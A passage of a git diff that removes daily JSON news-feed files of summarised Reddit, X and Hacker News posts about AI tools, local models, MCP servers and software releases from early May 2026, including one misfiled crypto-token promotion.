The goal is narrow: test whether compressed KV-cache workloads can be routed through a clean low-level backend ABI for: \\- compressed KV block registration \\- KV dot / QK partial execution \\- block-local attention partial decode \\- capability probing \\- fallback and correctness reporting \\- minimal benchmark validation Repository: [https://github.com/ixu2486/tq\\_compat\\_eval](https://github.com/ixu2486/tq_compat_eval) This is not a Google project, not an official TurboQuant implementation, and not a replacement for TurboQuant, llama.cpp, or existing model runtimes. It is also not the full RetryIX runtime. The private runtime, scheduling policy, hardware-interface contracts, and internal routing logic are not included. I would appreciate feedback from people working on KV-cache optimization, quantized inference, compressed-KV formats, long-context decoding, or backend integration.", - "category": "ai_models" - }, - { - "title": "Node.js v26.0.0 released (MAJOR UPDATE)", - "url": "https://github.com/nodejs/node/releases/tag/v26.0.0", - "source": "GitHub Releases · Node.js", - "tags": [ - "api_update", - "github_release", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "github_release", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-05T14:21:26.000Z", - "summary": "\n\n\nWe're excited to announce the release of Node.js 26! 
Highlights include the Temporal API enabled by default,\nupdates to the V8 JavaScript engine to 14.6, Undici to 8.0, and several important deprecations and removals\nas we continue to modernize the platform.\n\nAs a reminder, Node.js 26 will enter long-term support (LTS) in October, but until then, it will be the \"Current\" release for the next six months.\nWe encourage you to explore the new features and benefits offered by this latest release a", - "category": "ai_tools" - }, - { - "title": "Anthropic ships Claude for Creative Work with nine MCP-native connectors", - "url": "https://reddit.com/r/ClaudeAI/comments/1t48vtx/anthropic_ships_claude_for_creative_work_with/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "mcp", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-05T08:00:42.000Z", - "summary": "Anthropic announced Claude for Creative Work on April 28. The release includes nine official connectors that plug Claude into professional creative software, with a native Blender connector as the flagship. All nine are built on the Model Context Protocol (MCP), so Claude can read live project state and execute actions directly inside each app rather than operating through copy-paste workflows. The MCP piece is what makes this more than a plugin announcement. This is one of the first production-scale deployments where an LLM maintains persistent context within a host application's own data model. If the pattern holds up, it probably becomes the template for how agents integrate with domain-specific software more broadly. What creative tools would benefit most from this kind of native agent integration? I'd guess video editing is high on the list, but curious what others think. 
Announcement: [https://www.anthropic.com/news/claude-for-creative-work](https://www.anthropic.com/news/claude-for-creative-work)", - "category": "ai_tools" - }, - { - "title": "Offload routine Claude Code work to Gemma 4 through the Google GenAI API", - "url": "https://reddit.com/r/ClaudeAI/comments/1t4sj9u/offload_routine_claude_code_work_to_gemma_4/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-05T21:08:53.000Z", - "summary": "The idea of offload-mcp is simple: instead of running hardware-hungry local models for routine work, let Claude offload that work to FREE model APIs and SAVE tokens. I’m using Gemma via the Google GenAI API because I like it in my processing pipelines, but running it locally on my MacBook Air is slow and resource-limited. The API path is much more practical for small jobs. I didn't find any other tool on GitHub or elsewhere to handle that. offload-mcp takes care of commit messages, PR summaries, translations, docstrings, source diff/file summaries, and freeform prompts. Freeform is what I use most: send almost any routine prompt to a cheaper model instead of burning expensive Claude Code or Codex context on it. The source-based mode can read local diffs/files directly through the MCP server and reports estimated primary input tokens avoided. The default model chain uses Gemma, but model IDs are configurable. Curious if this fits anyone else’s Claude workflow! 
GitHub: [https://github.com/peterhadorn/offload-mcp](https://github.com/peterhadorn/offload-mcp)", - "category": "ai_tools" - }, - { - "title": "Anomaly Detection Belongs in Your Database — built SIMD-accelerated isolation forests into Stratum's SQL engine [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1t4riem/anomaly_detection_belongs_in_your_database_built/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-05T20:31:23.000Z", - "summary": "We added native anomaly detection in Stratum, our columnar analytics engine for the JVM. Train and score isolation forest models entirely from SQL — no Python, no export pipeline: SELECT * FROM transactions WHERE ANOMALY_SCORE('fraud_model') > 0.7; 6 microseconds per transaction, SIMD-accelerated, runs inside the query engine. The full write-up covers why we built it, how isolation forests work, and benchmarks against PyOD/scikit-learn: [https://datahike.io/notes/anomaly-detection-in-your-database/](https://datahike.io/notes/anomaly-detection-in-your-database/) Stratum is open source (Apache 2.0): [https://github.com/replikativ/stratum](https://github.com/replikativ/stratum) Happy to answer questions about the implementation — the isolation forest is pure Java with Vector API SIMD, scoring is fused into the query execution pipeline so it benefits from zone map pruning and chunked streaming.", - "category": "ai_research" - }, - { - "title": "Gemini has a big outage going on but refuses to acknowledge on official status page! 
How do you know if an LLM API is actually down vs just you?", - "url": "https://reddit.com/r/ClaudeAI/comments/1t4kbpa/gemini_has_a_big_outage_going_on_but_refuses_to/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-05T16:22:20.000Z", - "summary": "Genuine question. Gemini had a 5+ hour outage this morning. I found out because a user reported it on Tickerr, not because Google said anything. Status page was green the whole time. I built Tickerr using Claude Code for this only. It runs independent streaming API calls to LLM providers every 5 minutes and tracks real inference performance - not just HTTP pings. https://preview.redd.it/r6ugn0e57bzg1.png?width=1080&format=png&auto=webp&s=779961c2ee83245f9a46c10ced99f0ddc854494b The other way to know it's not just you is if other people are hitting the same thing at the same time. Which is why I also built a crowdsourced failure signal into [Tickerr.ai](https://tickerr.ai/mcp-server) \\- agents report 5xx errors anonymously and get back whether others are seeing the same thing. 
It's free to try, if you want to add reporting to your agent, three ways depending on your setup: **MCP (Claude Code, Cursor, Windsurf):** report_incident(provider=\"google\", model=\"gemini-2.5-flash\", error_code=503, error_type=\"overloaded\") **REST (any language):** curl -X POST https://tickerr.ai/api/v1/report \\ -H \"Content-Type: application/json\" \\ -d '{\"provider\":\"google\",\"model\":\"gemini-2.5-fla…", - "category": "ai_tools" - }, - { - "title": "SenseNova-U1-8B-MoT (novel open source multimodal understanding + image generation model) seems like a bigger deal architecturally then it’s getting credit for", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t4i1yx/sensenovau18bmot_novel_open_source_multimodal/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-05T15:02:15.000Z", - "summary": "SenseNova dropped SenseNova-U1 on the last day of April and I’ve only found like one other mostly ignored post on this sub talking about it. It seems like a really exciting novel architecture to me. It appears to be exceptional at text-to-infographics as one of its major high points, as well as being good at image editing, generation, and visual understanding. Supposedly it’s not the traditional mash-up (no VAE) types of multimodal models that we’ve seen before. The following is from their Hugging Face: https://huggingface.co/sensenova/SenseNova-U1-8B-MoT ——— Overview SenseNova U1 is a new series of native multimodal models that unifies multimodal understanding, reasoning, and generation within a monolithic architecture. It marks a fundamental paradigm shift in multimodal AI: from modality integration to true unification. Rather than relying on adapters to translate between modalities, SenseNova U1 models think-and-act across language and vision natively. 
The unification of visual understanding and generation opens tremendous possibilities. SenseNova U1 sits in the stage of Data-driven Learning (like ChatGPT), yet gestures toward the next stage, that is, Agentic Learning (like Ope…", - "category": "ai_models" - }, - { - "title": "Local Dream 2.4.3 - SDXL support, tag autocomplete and more", - "url": "https://reddit.com/r/StableDiffusion/comments/1t4d7ix/local_dream_243_sdxl_support_tag_autocomplete_and/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-05T11:53:55.000Z", - "summary": "Local Dream 2.4 was released two weeks ago and has since received three more updates. The main new features: \\- SDXL/Illustrious/PonyXL support for Snapdragon 8 Gen 3 and newer (Elite) chips, based on NPU \\- Tag autocomplete from CSV import \\- Token counter for prompts \\- LCM scheduler and many more fixes have been added. It’s worth checking out the release notes for version 2.4! [https://github.com/xororz/local-dream/releases](https://github.com/xororz/local-dream/releases)", - "category": "creative_tools" - }, - { - "title": "Building a 9-ball AI player: Candidate generation for direct cut shots [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1t3xplr/building_a_9ball_ai_player_candidate_generation/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-04T23:00:30.000Z", - "summary": "I'm building a 9-ball-player to help with pattern play. There are many ways to make the next ball, and sometimes in more than one obvious pocket. Which should should you choose depends on probability of making that shot AND ending up in a favorable spot for the next shot, that is also amenable to getting good position for the shot after. 
To that end, I have built the following components: * A transformer based model that learns p(win) given a table layout. * Candidate shot generator that includes cut shots, bank shots, kick shots, caroms and combination shots as well as safeties. * An evaluator that will pick the best shots based on the p(win) model on the resulting state of each candidate shot. The ground truth: **pooltool** Pool physics is well-modeled but expensive. I use pooltool python library, a solid open-source billiards simulator with accurate ball-cushion-pocket-felt interactions. A single shot takes \\~5–15 ms to simulate end-to-end on one CPU thread for the typical 1–3 object-ball layouts that come up in shot evaluation; full racks (9 object balls) push that to \\~20–50 ms because there are more pairwise collisions to track. Sounds fast until you do the math. For each la…", - "category": "ai_research" - }, - { - "title": "Parax v0.5: Parametric Modeling in JAX [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1t3jmdc/parax_v05_parametric_modeling_in_jax_p/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-04T14:38:31.000Z", - "summary": "Hi everyone! Just sharing an update on my project [Parax](https://github.com/gvcallen/parax), which caters for \"parametric modeling\" in JAX. Previously, Parax was more focused on scientific applications, however I've since generalized it to be a tool useful for any type of JAX work. It now has a strong focus on a clean, extandable API, as well as ensuring the library is entirely **opt-in,** as opposed to its previous versions which took a more framework-like approach. 
Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters * Filtering and manipulation tools The documentation is available [here](https://gvcallen.github.io/parax/) along with some basic examples. Perhaps the package is of use to someone out there! Cheers, Gary", - "category": "ai_research" - }, - { - "title": "AutoBe benchmark: structured harness narrows frontier-vs-local gap in backend generation [D]", - "url": "https://reddit.com/r/MachineLearning/comments/1t3hks9/autobe_benchmark_structured_harness_narrows/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-04T13:21:59.000Z", - "summary": "AutoBe is a benchmark for end-to-end backend generation. One natural language request produces six outputs: requirements analysis, ERD, OpenAPI spec, E2E tests, NestJS implementation, and a type-safe SDK. Each phase fills a predefined AST via structured function calling rather than generating unstructured code. The scoring rubric is 100 points driven entirely by static analysis - the same artifact scores the same regardless of who reruns it. The headline finding is that scores cluster tightly. GLM 5 tops the benchmark run. qwen3.5-27b sits directly behind frontier models. Several local models produced enterprise-scale backends with 100% compile success. The author's interpretation: once the harness is structured, backend-generation quality is constrained more by harness design than by model prestige. The cost contrast is significant. A full benchmark run at frontier pricing ($5/M input tokens) runs $1,000-$1,500 per model. 
The next benchmark round plans to filter to models at $0.25/M input or runnable on a 64GB unified-memory laptop - which would include most of the models that clustered near the top anyway. The honest caveat from the author: this uses four reference projects and…", - "category": "ai_research" - }, - { - "title": "\"FLUX Creator Program\" - New Flux models sooner than expected?", - "url": "https://reddit.com/r/StableDiffusion/comments/1t4vlo7/flux_creator_program_new_flux_models_sooner_than/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-05T23:10:28.000Z", - "summary": "are we getting new Flux models soon? hopefully open source. Would love a new klein model [link](https://x.com/bfl_ml/status/2051723708046233688) to post", - "category": "creative_tools" - }, - { - "title": "Best Open Source models for running on Gaming PC or Mac mini M4", - "url": "https://reddit.com/r/StableDiffusion/comments/1t4p2mn/best_open_source_models_for_running_on_gaming_pc/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-05T19:04:40.000Z", - "summary": "I have a gaming PC with a Nvidia 5070 12gb VRAM 32gb RAM and a ryzen 9 7800x 12 core I also have a Mac mini m4 * Chip (Processor): Apple M4 chip with 10-core CPU, 10-core GPU, 16-core Neural Engine * Memory: 32GB unified memory * Storage: 512GB SSD storage Wanted to get opinions on best open source models for agentic and generative purposes on these machines Thank you!", - "category": "creative_tools" - }, - { - "title": "OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. 
The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integrati…", - "url": "https://x.com/H_Mhatre_/status/2051715305890521578", - "source": "X / @h_mhatre_", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-05-05T17:27:02.000Z", - "summary": "OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integration. $MSFT", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-06.json b/data/news-feed-2026-05-06.json deleted file mode 100644 index d8493de..0000000 --- a/data/news-feed-2026-05-06.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:38.082Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-06", - "article_count": 15, - "archived_story_count": 542, - "articles": [ - { - "title": "[WIP] ComfyUI Powered Klein 2 KV Edit i2i plugin (Chromium)", - "url": "https://reddit.com/r/StableDiffusion/comments/1t5rofv/wip_comfyui_powered_klein_2_kv_edit_i2i_plugin/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-06T22:12:19.000Z", - "summary": "This is something I am working on based upon an earlier WIP item that was using ZiT for something similar. However with Klein KV a lot of power to manipulate is in the prompts. So I am currently testing/building an i2i web browser plugin that allows custom prompt creating and saving and can be expanded and sorted by tabs. I'm going to post this link as a demo and/or bones for other to also take and run with as well. 
I do plan on updating some things here myself in my upcoming free time, but for some people this might be just what may work for them. At the end of the day it's all just html/js/css and we all have LLM's and enjoy open source. This can also be converted to a firefox plugin if you wish as well. Feel free to take it and do whatever else you may want to and consider this the starter template for it. [https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2\\_KVEdit\\_i2i%20-%20Chromium%20Sidebar-Demo.zip](https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2_KVEdit_i2i%20-%20Chromium%20Sidebar-Demo.zip) If you never interacted with ComfyUI outside of it, you will need to enable API mode in the settings. You will al…", - "category": "creative_tools" - }, - { - "title": "OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI", - "url": "https://x.com/Reeperr131/status/2052074977973694608", - "source": "X search / Agent workflows", - "tags": [ - "api_update", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-06T17:16:15.000Z", - "summary": "OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI", - "category": "ai_agents" - }, - { - "title": "CopilotKit (MIT) - Open-Source Building Blocks for Agent Apps and Generative UI", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t5gus6/copilotkit_mit_opensource_building_blocks_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-06T15:50:28.000Z", - "summary": "Even with 
agent framework DX getting somewhat better - it's still really annoying to build real apps with them. Even a basic in-app agent chatbot already drags in streaming, tool call rendering, and state sync. Vercel's AI SDK makes it much easier to start, but it pulls you right into Vercel's whole stack and is too opinionated on the agent framework side. This is what is great about CopilotKit (30k stars, MIT). They provide React building blocks for the agent UI layer: chat, streaming, tool calls, HITL, generative UI. The piece that makes it horizontal is AG-UI, an open protocol it speaks on the backend, with shipped support in LangGraph, ADK, Strands, CrewAI, Mastra, Pydantic AI, LlamaIndex, Agno, and others. Same UI, any agent framework, no per-framework adapter. Bring your own everything: agent, model, backend, hosting. It's really powerful. I discovered CopilotKit after being involved with the community on open source AG-UI which they're very involved with. Have had a great experience building with it! Not sure why people aren't talking about it more. Repo: [https://github.com/CopilotKit/CopilotKit](https://github.com/CopilotKit/CopilotKit)", - "category": "ai_models" - }, - { - "title": "2.5x faster inference with Qwen 3.6 27B using MTP - Finally a viable option for local agentic coding - 262k context on 48GB - Fixed chat template - Drop-in OpenAI and Anthropic API endpoints", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t57xuu/25x_faster_inference_with_qwen_36_27b_using_mtp/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-06T09:35:42.000Z", - "summary": "> **WARNING: wait before download from HF: I just realised my upload of the new versions with the additional fix in the chat template has not completed yet. 
I will remove this warning once done** The recent PR to llama.cpp bring MTP support to Qwen 3.6 27B. This uses the built-in tensor layers for speculative decoding. None of the existing GGUF have it, as they need to be converted with this PR. I have tested it locally on my mac M2 Max 96GB, and the results are amazing: 2.5x speed increase, bringing it to 28 tok/s! In addition the recent releases of llama.cpp also support turboquants, which helps a lot with memory usage in more constrained environment (including an additional speed boost). I have converted the most useful quants and uploaded them to HF. Even if you are using apple silicon, you should use those instead of MLX. You can download them here: [https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF](https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF) This also includes 7 fixes I made to the original jinja chat template, due to vLLM specificity which broke in other tools: https://huggingface.co/froggeric/Qwen-Fixed-Chat-Templates For now, you will need to compile yo…", - "category": "ai_models" - }, - { - "title": "Getting error \"command 'claude-vscode.editor.openLast' not found\", but not like anyone has talked about.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t51ayl/getting_error_command_claudevscodeeditoropenlast/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-06T03:26:08.000Z", - "summary": "I've read many posts and github pages about this exact issue, but mine is different. Its not jsut that error. Any anthropic claude code command from logout to open in sidebar resutls in the error \"Command 'Claude Code: <command>' resulted in an error. command 'claude-vscode.sidebar.<command>' not found\". I have tried to diagnose and fix the issue and its not working. Here is what is not working: 1. Claude sidebar not working 2. 
No claude commands from command pallete working 3. Claude extension icon not showing up on far left side and not in the dropdown for extensions to show Here is the error from Developer: Show Logs.. with choosing Extension Host: `2026-05-05 21:57:07.411 [error] Activating extension Anthropic.claude-code failed due to an error:` `2026-05-05 21:57:07.412 [error] TypeError: The argument 'filename' must be a file URL object, file URL string, or absolute path string. Received 'file:///home/runner/work/claude-cli-internal/claude-cli-internal/build-agent-sdk/sdk.mjs'` `at Module.createRequire (node:internal/modules/cjs/loader:1922:13)` `at Object.<anonymous> (c:\\Users\\___\\.vscode\\extensions\\anthropic.claude-code-2.1.129-win32-x64\\extension.js:102:…", - "category": "ai_tools" - }, - { - "title": "UniReasoner: Using LLMs as \"Universal Reasoners\" to Fix Prompt Alignment", - "url": "https://reddit.com/r/StableDiffusion/comments/1t5p67x/unireasoner_using_llms_as_universal_reasoners_to/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-06T20:39:46.000Z", - "summary": "A new paper titled Large Language Models are Universal Reasoners for Visual Generation introduces UniReasoner, a framework designed to close the \"understanding-generation gap\" in text-to-image models. The core observation is that while unified multimodal models often fail to follow complex prompts during generation (e.g., getting counts or spatial relations wrong), the exact same model is usually excellent at verifying those mistakes when looking at the resulting image. Current models like BAGEL might generate five apples when asked for four. However, if you ask that same model to count the apples in its own generated image, it correctly identifies there are five. 
This suggests that the model's \"understanding\" capacity is much stronger than its \"generative\" capacity. UniReasoner converts this verification strength into direct guidance for the diffusion process using a three-stage pipeline: 1. The LLM generates a coarse visual draft using discrete vision tokens. This acts as a spatial and semantic plan for the scene. 2. The same LLM evaluates its draft against the original prompt. It produces a \"grounded evaluation\" in text, pinpointing exactly what is wrong (e.g., \"Missing a bicyc…", - "category": "creative_tools" - }, - { - "title": "Followup to the kanban for Claude Code - now vibeyard's home screen is a yard I build myself", - "url": "https://reddit.com/r/ClaudeAI/comments/1t5og8l/followup_to_the_kanban_for_claude_code_now/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-06T20:13:39.000Z", - "summary": "Even with the kanban, I still opened 3 tabs every morning - PRs in GitHub, tasks on the board, half-finished sessions in the terminal - just to figure out what to work on. So I made the home screen of **Vibeyard** (open-source, MIT) a yard you build yourself. Drop in widgets - open PRs, issues, AI readiness, active sessions, kanban, team - arrange them however you want. **Click any card → it spawns a Claude session scoped to it. A PR opens a review session. An issue opens a plan-the-fix session. 
A stale session resumes where you left off.** (Followup to my last post: https://www.reddit.com/r/ClaudeAI/comments/1sye8bs/) GitHub: [https://github.com/elirantutia/vibeyard](https://github.com/elirantutia/vibeyard) **Contributions and feedbacks are welcome!**", - "category": "ai_tools" - }, - { - "title": "Internal tools wIth no MCP", - "url": "https://reddit.com/r/ClaudeAI/comments/1t5ah5r/internal_tools_with_no_mcp/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-06T11:46:48.000Z", - "summary": "We have several internal systems that all have robust APIs. Some are internet facing and some are not. None of them have MCP servers available for them. Im trying to figure out what and how the best way is to connect Claude Enterprise to these systems via API to pull the data we need from them with MCP.", - "category": "ai_tools" - }, - { - "title": "Show HN: Adam – An embeddable cross-platform AI agent library", - "url": "https://github.com/sqliteai/adam", - "source": "Hacker News", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 0.96, - "date": "2026-05-06T12:56:29.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "The GB10 Solution Atlas is now open source, the inference engine made for the community with breakneck inference speeds (Qwen3.6-35B-FP8 100+ tok/s)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t5p2yv/the_gb10_solution_atlas_is_now_open_source_the/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-06T20:36:19.000Z", - "summary": "Some of you saw our post a couple weeks back about hitting 102 tok/s stable on Qwen3.5-35B on a DGX Spark. 
A lot of you asked \"cool, where's the code?\" Today's the day: [Github](https://github.com/Avarok-Cybersecurity/atlas) **Atlas is open source.** Pure Rust + CUDA, no PyTorch, no Python runtime, \\~2.5 GB image, <2 minute cold start. We rewrote the whole stack from HTTP handler to kernel dispatch because the bottleneck on Spark wasn't the silicon, it was 20+ GB of generic Python machinery sitting between your prompt and the GPU. We need community support to keep elevating Atlas **for developers**. **Numbers on a single DGX Spark (GB10):** Qwen3.5-35B (NVFP4, MTP K=2): 130 tok/s peak, \\~111 tok/s sustained → 3.0–3.3x vLLM at testing time Qwen3.5-122B (NVFP4, EP=2): \\~50 tok/s decode Qwen3-Next-80B-A3B (NVFP4, MTP): \\~87 tok/s Nemotron-3 Nano 30B (FP8): \\~88 tok/s Full model matrix on the site (Minimax2.7, Qwen3.6, Gemma too!) **What's actually different:** Hand-tuned CUDA kernels for Blackwell SM120/121 meaning attention, MoE, GDN, Mamba-2. No generic fallbacks. Native NVFP4 + FP8 on tensor cores MTP (Multi-Token Prediction) speculative decoding for up to 3x throughput on deco…", - "category": "ai_models" - }, - { - "title": "Anyone else tried this RefineAnything LoRA? Pretty impressed so far", - "url": "https://reddit.com/r/StableDiffusion/comments/1t5n9nz/anyone_else_tried_this_refineanything_lora_pretty/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-06T19:32:13.000Z", - "summary": "Been messing around with the RefineAnything project for the past few days and honestly the results are kinda wild for local detail fixes. Figured I'd share in case anyone else is into this stuff. Quick rundown of what it does: you give it an image + a region (scribble mask or bounding box), and it cleans up just that area — text, logos, product labels, thin lines, that kind of thing. The rest of the image stays untouched. Works with or without a reference image too. 
Original project: [https://github.com/limuloo/RefineAnything](https://github.com/limuloo/RefineAnything) While I was testing it I got tired of doing the mask prep, reference alignment, and paste-back manually every time, so I built a little ComfyUI plugin to handle all that. Just wanted to be clear though — **the plugin isn't tied to this specific LoRA at all**. It's totally model-agnostic, so it should work fine for pretty much any local detail repair workflow you're already running. RefineAnything just happens to be what I tested it with, and my test workflow is included in the plugin repo if you want to try it. Plugin: [https://github.com/1Kynx/ComfyUI-RefineNode](https://github.com/1Kynx/ComfyUI-RefineNode) Where I…", - "category": "creative_tools" - }, - { - "title": "I analyzed 922 agentic task trace and found the secret weapon of DeepSeek v4", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t5lywi/i_analyzed_922_agentic_task_trace_and_found_the/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-06T18:46:20.000Z", - "summary": "I recently did a benchmark of deepseek v4 in agentic tasks. Performance-wise, it's one of the best open source models, as expected. What really surprised me is the cost. I mean I know it's cheap, but it's cheap in a way that doesn't really make sense. # Cost Estimation Let's take v4 flash as example since it's not on sale (so it can better reflect the actual provider cost). [deepseek v4 flash price on openrouter](https://preview.redd.it/vh4qfgn6zjzg1.png?width=562&format=png&auto=webp&s=8df0fae84b5b5840efdc87e50ef2db6a5fc23134) [opus 4.7 price on openrouter](https://preview.redd.it/c7qumr2u0kzg1.png?width=533&format=png&auto=webp&s=31101fb42a75d2ba33169c570c61e4297c28901b) Looking at OpenRouter price, deepseek v4 flash price is about 0.03x opus 4.7 price. 
(We only look at input token price because in long agentic task, input token is the dominant cost.) So if v4 flash uses similar amount of token in a task as opus 4.7, the actual cost should be somewhere around 0.03x compared to using opus. # Actual Data Then I ran the benchmark, long agentic tasks running in openclaw (which uses PI for agent loop), openrouter as model provider. The actual cost data blew my…", - "category": "ai_models" - }, - { - "title": "the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not \"ai productivity copilot for everyone.\" one pai…", - "url": "https://x.com/NovaByArun/status/2052077319960047791", - "source": "X search / AI vibes", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-05-06T17:25:33.000Z", - "summary": "the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not \"ai productivity copilot for everyone.\" one painful workflow. one credible audience.", - "category": "ai_tools" - }, - { - "title": "Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha", - "url": "https://x.com/AzaleasWatkin/status/2052075760354238868", - "source": "X search / Agent workflows", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-05-06T17:19:21.000Z", - "summary": "Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha", - "category": "ai_agents" - }, - { - "title": "I can't keep with Claude releases anymore.. 
how many AI agents are actually shipping all these e2e features at Anthropic?", - "url": "https://x.com/MichaelAzmy/status/2052075579424334002", - "source": "X search / AI model updates", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-06T17:18:38.000Z", - "summary": "I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic?", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-07.json b/data/news-feed-2026-05-07.json deleted file mode 100644 index 1af29d9..0000000 --- a/data/news-feed-2026-05-07.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:38.227Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-07", - "article_count": 15, - "archived_story_count": 548, - "articles": [ - { - "title": "I embedded an AI agent in my shell. It can now run interactive programs.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t6nuhz/i_embedded_an_ai_agent_in_my_shell_it_can_now_run/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "open_source", - "developer_tool", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - 